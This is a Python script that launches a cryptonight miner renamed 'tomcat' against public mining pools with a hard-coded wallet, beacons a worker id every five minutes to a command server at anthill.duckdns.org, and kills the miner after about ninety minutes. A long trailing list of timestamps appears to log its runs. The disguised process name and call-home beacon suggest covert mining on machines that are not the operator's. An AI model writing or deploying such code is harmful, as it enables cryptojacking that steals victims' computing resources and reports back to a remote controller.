import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:36:06.829077
#2018-02-17 17:24:01.636085
#2018-02-17 19:13:01.378897
#2018-02-17 21:01:06.375158
#2018-02-17 22:46:01.384151
#2018-02-18 00:29:01.722622
#2018-02-18 02:20:07.165255
#2018-02-18 04:07:04.876061
#2018-02-18 05:58:01.433003
#2018-02-18 07:50:06.315326
#2018-02-18 09:38:06.078772
#2018-02-18 11:24:05.748394
#2018-02-18 13:10:07.599877
#2018-02-18 14:58:07.520477
#2018-02-18 16:47:05.726261
#2018-02-18 18:35:07.485718
#2018-02-18 20:23:01.405911
#2018-02-18 22:09:04.502257
#2018-02-18 23:57:03.545415
#2018-02-19 01:44:01.839484
#2018-02-19 03:32:03.834063
#2018-02-19 05:16:07.524904
#2018-02-19 07:03:01.574651
#2018-02-19 08:51:07.273237
#2018-02-19 10:40:05.052074
#2018-02-19 12:26:08.495740
#2018-02-19 14:14:04.684524
#2018-02-19 16:03:05.197729
#2018-02-19 17:51:04.288700
#2018-02-19 19:38:07.209449
#2018-02-19 21:26:07.548742
#2018-02-19 23:12:05.117455
#2018-02-20 00:58:01.379064
#2018-02-20 02:48:02.105794
#2018-02-20 04:37:06.241353
#2018-02-20 06:21:06.179999
#2018-02-20 08:06:06.912382
#2018-02-20 09:52:05.664518
#2018-02-20 11:36:07.399864
#2018-02-20 13:23:08.204929
#2018-02-20 15:07:05.905485
#2018-02-20 16:53:04.520124
#2018-02-20 18:43:07.597836
#2018-02-20 20:33:08.023852
#2018-02-20 22:18:06.833477
#2018-02-20 23:59:01.290902
#2018-02-21 01:43:06.381035
#2018-02-21 03:31:06.670499
#2018-02-21 05:19:07.407377
#2018-02-21 07:08:05.107478
#2018-02-21 08:54:04.577733
#2018-02-21 10:42:05.971965
#2018-02-21 12:29:08.332594
#2018-02-21 14:16:07.157250
#2018-02-21 16:03:01.896348
#2018-02-21 17:55:06.579747
#2018-02-21 19:40:09.593379
#2018-02-21 21:28:04.386654
#2018-02-21 23:14:01.640654
#2018-02-22 01:04:04.105705
#2018-02-22 02:51:07.011151
#2018-02-22 04:38:01.898273
#2018-02-22 06:22:07.567061
#2018-02-22 08:10:05.292584
#2018-02-22 09:58:06.491386
#2018-02-22 11:43:06.084553
#2018-02-22 13:29:06.494442
#2018-02-22 15:19:07.966575
#2018-02-22 17:06:08.868092
#2018-02-22 18:52:01.503293
#2018-02-22 20:43:07.337006
#2018-02-22 22:29:01.995334
#2018-02-23 00:16:01.312409
#2018-02-23 02:03:07.223629
#2018-02-23 03:52:05.266903
#2018-02-23 05:41:08.372874
#2018-02-23 07:26:06.558479
#2018-02-23 09:31:06.638270
#2018-02-23 11:38:07.436529
#2018-02-23 13:26:09.167527
#2018-02-23 15:12:05.242914
#2018-02-23 17:00:01.653018
#2018-02-23 18:46:09.919728
#2018-02-23 20:33:05.563991
#2018-02-23 22:21:07.017934
#2018-02-24 00:07:01.419051
#2018-02-24 01:57:02.076330
#2018-02-24 03:49:05.446224
#2018-02-24 05:31:02.200990
#2018-02-24 07:17:04.728124
#2018-02-24 09:08:06.241586
#2018-02-24 10:43:05.856181
#2018-02-24 12:27:01.966605
#2018-02-24 14:06:01.724361
#2018-02-24 15:43:07.254908
#2018-02-24 17:19:04.737638
#2018-02-24 18:49:07.305086
#2018-02-24 20:22:05.978518
#2018-02-24 21:50:08.841471
#2018-02-25 00:30:11.158662
#2018-02-25 02:37:05.138513
#2018-02-25 06:16:01.755664
#2018-02-25 11:40:05.462548